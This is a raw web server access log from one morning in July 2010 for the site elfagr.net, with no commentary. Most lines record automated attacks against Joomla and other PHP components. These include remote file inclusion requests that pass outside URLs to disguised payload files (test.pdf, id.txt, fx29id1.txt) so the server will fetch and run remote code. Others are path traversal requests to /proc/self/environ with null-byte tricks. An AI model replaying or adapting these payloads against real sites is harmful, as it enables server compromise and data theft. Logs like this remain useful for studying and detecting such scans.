91.191.136.210 - - [02/Jul/2010:05:30:28 -0700] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.elfagr.net"
195.189.95.54 - - [02/Jul/2010:05:37:16 -0700] "GET /index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
212.13.42.169 - - [02/Jul/2010:05:39:31 -0700] "GET /components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.elfagr.net"
212.13.42.169 - - [02/Jul/2010:05:39:22 -0700] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.elfagr.net"
195.189.95.54 - - [02/Jul/2010:05:44:34 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
195.189.95.54 - - [02/Jul/2010:05:44:44 -0700] "GET /index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
195.189.95.54 - - [02/Jul/2010:05:44:34 -0700] "GET /logs//index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
195.189.95.54 - - [02/Jul/2010:05:47:29 -0700] "GET /logs/scripts.log//index.php?option=com_gcalendar&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
67.218.116.169 - - [02/Jul/2010:05:47:26 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
203.135.176.244 - - [02/Jul/2010:05:49:30 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.elfagr.net"
212.13.42.169 - - [02/Jul/2010:05:52:31 -0700] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.elfagr.net"
212.13.42.169 - - [02/Jul/2010:05:52:42 -0700] "GET /components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.dukhi.co.uk/includes/PEAR/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:05:53:49 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:05:53:38 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:05:58:42 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:05:58:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:04:45 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:09:39 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:09:50 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:13:34 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:13:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
65.13.185.104 - - [02/Jul/2010:06:14:22 -0700] "GET /logs/access_100121.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
65.13.185.104 - - [02/Jul/2010:06:14:23 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
65.13.185.104 - - [02/Jul/2010:06:14:24 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.likeplay.biz/technote7/data/install/momok.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
62.182.63.49 - - [02/Jul/2010:06:15:14 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:17:36 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:17:36 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
62.182.63.49 - - [02/Jul/2010:06:19:01 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
62.182.63.49 - - [02/Jul/2010:06:18:51 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:21:00 -0700] "GET /logs/access_091126.log////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:21:11 -0700] "GET ///////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 200 1454 "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:21:11 -0700] "GET /logs////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:21:42 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:21:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:26:10 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:25:59 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:27:07 -0700] "GET /logs////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:27:07 -0700] "GET /logs/access_091126.log%20%20////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:27:07 -0700] "GET ///////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1470 "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:28:01 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:28:11 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:28:01 -0700] "GET /logs/access_091029.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:28:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:28:14 -0700] "GET /logs/access_091029.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:28:04 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:30:31 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:30:20 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:32:57 -0700] "GET /logs/access_091029.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
149.31.6.24 - - [02/Jul/2010:06:32:55 -0700] "GET /logs/access_091029.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:33:14 -0700] "GET /logs/access_091126.log////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:33:14 -0700] "GET /logs////////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.elfagr.net"
113.30.66.24 - - [02/Jul/2010:06:33:25 -0700] "GET ///////?cmd&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1470 "-" "Mozilla/5.0" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:34:06 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:34:16 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
62.182.63.49 - - [02/Jul/2010:06:34:31 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
62.182.63.49 - - [02/Jul/2010:06:34:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
62.182.63.49 - - [02/Jul/2010:06:34:32 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:38:38 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:38:48 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
216.129.119.42 - - [02/Jul/2010:06:47:13 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:47:45 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:47:56 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
67.218.116.165 - - [02/Jul/2010:06:52:47 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:53:56 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:06:53:56 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:01:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
178.161.24.150 - - [02/Jul/2010:07:02:50 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)" "www.elfagr.net"
178.161.24.150 - - [02/Jul/2010:07:03:18 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:06:07 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:05:58 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:09:53 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:09:54 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:00 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:01 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:29 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:19 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:31 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:31 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:10:59 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:49 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:10:59 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:11:00 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:50 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:11:01 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:51 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:10:51 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:14:16 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [02/Jul/2010:07:14:16 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:15:12 -0700] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:15:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
81.208.34.38 - - [02/Jul/2010:07:15:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://coquincoquine.com/rencontre//forum/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:17 -0700] "POST /logs/access_091210.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:15:18 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:07:15:07 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:13 -0700] "POST /logs/access_091210.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
74.208.96.47 - - [02/Jul/2010:07:15:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:07:15:14 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
